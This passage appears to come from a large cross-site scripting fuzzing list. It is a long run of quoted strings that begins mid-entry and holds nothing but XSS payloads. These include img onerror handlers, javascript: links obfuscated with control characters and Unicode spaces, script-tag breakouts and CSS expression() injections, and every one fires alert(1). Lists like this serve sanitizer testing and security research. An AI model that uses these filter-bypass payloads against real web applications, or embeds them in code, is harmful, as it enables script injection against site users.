onerror=javascript:alert(1)> -->', '--><!-- --\\x21> <img src=xxx:x onerror=javascript:alert(1)> -->', '--><!-- --\\x3E> <img src=xxx:x onerror=javascript:alert(1)> 
-->', '`"\'><img src=\'#\\x27 onerror=javascript:alert(1)>', '<a href="javascript\\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>', '"\'`><p><svg><script>a=\'hello\\x27;javascript:alert(1)//\';</script></p>', '<a href="javas\\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>', 
'<a href="javas\\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>', '<script>/* *\\x2A/javascript:alert(1)// */</script>', '</ScrIpt><script>/* *\\x2A/javascript:alert(1)// */</script>', '"><script>/* *\\x2A/javascript:alert(1)// */</script>', '</ScrIpt><script>/* *\\x2A/javascript:alert(1)// */</script>', "'><script>/* *\\x2A/javascript:alert(1)// */</script>", '</ScrIpt><script>/* *\\x2A/javascript:alert(1)// */</script>', 
'<script>/* *\\x00/javascript:alert(1)// */</script>', '</ScrIpt><script>/* *\\x00/javascript:alert(1)// */</script>', '"><script>/* *\\x00/javascript:alert(1)// */</script>', '</ScrIpt><script>/* *\\x00/javascript:alert(1)// */</script>', "'><script>/* *\\x00/javascript:alert(1)// */</script>", '</ScrIpt><script>/* *\\x00/javascript:alert(1)// */</script>', '<style></style\\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>', '<style></style\\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>', '<style></style\\x09<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x09<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x09<img src="about:blank" onerror=javascript:alert(1)//></style>', '<style></style\\x20<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x20<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x20<img src="about:blank" onerror=javascript:alert(1)//></style>', '<style></style\\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>', '"\'`>ABC<div style="font-family:\'foo\'\\x7Dx:expression(javascript:alert(1);/*\';">DEF', '"\'`>ABC<div style="font-family:\'foo\'\\x3Bx:expression(javascript:alert(1);/*\';">DEF', '<script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', 
'"><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '\'><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '<script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '"><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '\'><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '<script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '"><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '\'><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '\'`"><\\x3Cscript>javascript:alert(1)</script>', '"\'`><\\x3Cimg src=xxx:x onerror=javascript:alert(1)>', '"\'`><\\x00img src=xxx:x onerror=javascript:alert(1)>', '<script src="data:text/plain\\x2Cjavascript:alert(1)"></script>', '"><script src="data:text/plain\\x2Cjavascript:alert(1)"></script>', '\'><script src="data:text/plain\\x2Cjavascript:alert(1)"></script>', '<script src="data:\\xD4\\x8F,javascript:alert(1)"></script>', '"><script src="data:\\xD4\\x8F,javascript:alert(1)"></script>', '\'><script src="data:\\xD4\\x8F,javascript:alert(1)"></script>', '<script src="data:\\xE0\\xA4\\x98,javascript:alert(1)"></script>', '"><script 
src="data:\\xE0\\xA4\\x98,javascript:alert(1)"></script>', '\'><script src="data:\\xE0\\xA4\\x98,javascript:alert(1)"></script>', '<script src="data:\\xCB\\x8F,javascript:alert(1)"></script>', '"><script src="data:\\xCB\\x8F,javascript:alert(1)"></script>', '\'><script src="data:\\xCB\\x8F,javascript:alert(1)"></script>', 'ABC<div style="x\\x3Aexpression(javascript:alert(1)">DEF', 'ABC<div style="x:expression\\x5C(javascript:alert(1)">DEF', 'ABC<div style="x:expression\\x00(javascript:alert(1)">DEF', 'ABC<div style="x:exp\\x00ression(javascript:alert(1)">DEF', 'ABC<div style="x:exp\\x5Cression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x0Aexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x09expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE3\\x80\\x80expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x84expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xC2\\xA0expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x80expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x0Dexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x0Cexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x87expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x20expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x88expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x00expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x86expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x85expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x82expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x0Bexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x81expression(javascript:alert(1)">DEF', 'ABC<div 
style="x:\\xE2\\x80\\x83expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x89expression(javascript:alert(1)">DEF', '<a href="\\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xC2\\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xC2\\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xC2\\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a 
href="\\xE2\\x80\\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x10javascript:javascript:alert(1)" 
id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a 
href="\\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE1\\x9A\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE1\\x9A\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE1\\x9A\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a 
href="\\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE3\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE3\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE3\\x80\\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x0Cjavascript:javascript:alert(1)" 
id="fuzzelement1">test</a>', '"><a href="\\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x80\\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x80\\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a 
href="\\xE2\\x80\\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x80\\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\xE2\\x81\\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\xE2\\x81\\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\xE2\\x81\\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="\\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="\\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="\\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x00:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x00:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x00:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x3A:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x3A:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x3A:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x09:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x09:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x09:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x0D:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x0D:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x0D:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javascript\\x0A:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x0A:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a 
href="javascript\\x0A:javascript:alert(1)" id="fuzzelement1">test</a>', '`"\'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x22onerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x0Donerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x09onerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x0Conerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x00onerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x27onerror=javascript:alert(1)>', '`"\'><img src=xxx:x \\x20onerror=javascript:alert(1)>', '`"\'><img src=x onerror=javascript:alert('1')>', '"><img src=x onerror=javascript:alert('1')>', "'><img src=x onerror=javascript:alert('1')>", '<img src=x onerror=javascript:alert('1')>', '"><img src=x onerror=javascript:alert('1')>', "'><img src=x onerror=javascript:alert('1')>", '"`\'><script>\\x3Bjavascript:alert(1)</script>', '"`\'><script>\\x0Djavascript:alert(1)</script>', '"`\'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x81javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x84javascript:alert(1)</script>', '"`\'><script>\\xE3\\x80\\x80javascript:alert(1)</script>', '"`\'><script>\\x09javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x89javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x85javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x88javascript:alert(1)</script>', '"`\'><script>\\x00javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>', '"`\'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>', '"`\'><script>\\x0Cjavascript:alert(1)</script>', '"`\'><script>\\x2Bjavascript:alert(1)</script>', '"`\'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>', '"`\'><script>-javascript:alert(1)</script>', '"`\'><script>\\x0Ajavascript:alert(1)</script>', 
'"`\'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>', '"`\'><script>\\x7Ejavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x87javascript:alert(1)</script>', '"`\'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>', '"`\'><script>\\xC2\\x85javascript:alert(1)</script>', '"`\'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x83javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>', '"`\'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x80javascript:alert(1)</script>', '"`\'><script>\\x21javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x82javascript:alert(1)</script>', '"`\'><script>\\xE2\\x80\\x86javascript:alert(1)</script>', '"`\'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>', '"`\'><script>\\x0Bjavascript:alert(1)</script>', '"`\'><script>\\x20javascript:alert(1)</script>', '"`\'><script>\\xC2\\xA0javascript:alert(1)</script>', '"/><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />', '"><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />', "'><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />", '"/><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />', '"><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />', "'><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />", '"/><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />', '"><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />', "'><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />", '"/><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />', '"><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />', "'><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />", '"/><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />', '"><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />', "'><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />", 